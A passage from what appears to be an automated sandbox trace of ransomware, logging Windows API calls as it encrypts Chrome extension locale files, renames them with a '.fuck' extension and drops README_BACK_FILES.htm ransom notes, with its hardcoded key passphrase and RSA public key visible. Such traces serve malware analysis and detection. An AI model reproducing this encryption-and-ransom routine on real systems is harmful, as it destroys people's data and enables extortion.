pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.565] CryptEncrypt (in: hKey=0x2e198a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15e30*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15e30*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.566] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e15e30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15e30*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.567] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x183, lpOverlapped=0x0) returned 1 [0257.575] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x183, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x190) returned 1 [0257.575] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x190, lpOverlapped=0x0) returned 1 [0257.576] CloseHandle (hObject=0x5d5c) returned 1 [0257.576] CloseHandle (hObject=0x5d60) returned 1 [0257.576] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json"), bFailIfExists=0) returned 1 [0257.579] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json", dwFileAttributes=0x0) returned 1 [0257.580] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json.gsg")) returned 1 [0257.581] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json.fuck")) returned 1 [0257.582] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0257.582] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.582] CryptReleaseContext (hProv=0x293aae8, dwFlags=0x0) returned 1 [0257.582] FindNextFileA (in: hFindFile=0x2e18128, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.582] FindClose (in: hFindFile=0x2e18128 | out: hFindFile=0x2e18128) returned 1 [0257.583] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\readme_back_files.htm")) returned 0xffffffff [0257.583] AreFileApisANSI () returned 1 [0257.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4618, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.583] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.584] GetFileType (hFile=0x5d50) returned 0x1 [0257.584] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.585] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.585] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.585] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.585] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.585] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.585] GetLastError () returned 0x0 [0257.586] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json")) returned 0x20 [0257.586] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json", dwFileAttributes=0x80) returned 1 [0257.586] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.587] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.588] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.589] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0257.591] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.591] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.591] CryptHashData (hHash=0x2e18128, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.592] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.592] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.592] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.592] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293aae8) returned 1 [0257.592] CryptImportPublicKeyInfo (in: hCryptProv=0x293aae8, dwCertEncodingType=0x1, pInfo=0x2e24f60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24f90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24f98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e198e8) returned 1 [0257.592] CryptEncrypt (in: hKey=0x2e198e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.592] CryptEncrypt (in: hKey=0x2e198e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e790d0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e790d0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.593] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e790d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e790d0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.594] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1c3, lpOverlapped=0x0) returned 1 [0257.595] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1c3, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1d0) returned 1 [0257.595] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1d0, lpOverlapped=0x0) returned 1 [0257.595] CloseHandle (hObject=0x5d60) returned 1 [0257.595] CloseHandle (hObject=0x5d5c) returned 1 [0257.595] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json"), bFailIfExists=0) returned 1 [0257.603] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json", dwFileAttributes=0x0) returned 1 [0257.604] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json.gsg")) returned 1 [0257.605] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\messages.json.fuck")) returned 1 [0257.607] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.607] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.607] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0257.607] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.607] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.607] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\readme_back_files.htm")) returned 0xffffffff [0257.607] AreFileApisANSI () returned 1 [0257.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.608] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.608] GetFileType (hFile=0x5d50) returned 0x1 [0257.608] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.610] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.610] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.611] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.611] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.611] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.611] GetLastError () returned 0x0 [0257.611] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json")) returned 0x20 [0257.611] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json", dwFileAttributes=0x80) returned 1 [0257.612] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.612] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.613] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.614] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e78f38) returned 1 [0257.616] CryptCreateHash (in: hProv=0x2e78f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.616] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.616] CryptHashData (hHash=0x2e18128, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.616] CryptDeriveKey (in: hProv=0x2e78f38, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.616] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.616] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.616] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79c80) returned 1 [0257.617] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79c80, dwCertEncodingType=0x1, pInfo=0x2e25030*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25060*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25068*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19ba8) returned 1 [0257.617] CryptEncrypt (in: hKey=0x2e19ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.617] CryptEncrypt (in: hKey=0x2e19ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79400*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79400*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.617] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e79400*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79400*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.618] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x12c, lpOverlapped=0x0) returned 1 [0257.619] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x12c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0257.619] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0257.619] CloseHandle (hObject=0x5d5c) returned 1 [0257.619] CloseHandle (hObject=0x5d60) returned 1 [0257.620] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json"), bFailIfExists=0) returned 1 [0257.624] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json", dwFileAttributes=0x0) returned 1 [0257.625] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json.gsg")) returned 1 [0257.626] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\messages.json.fuck" (normalized: 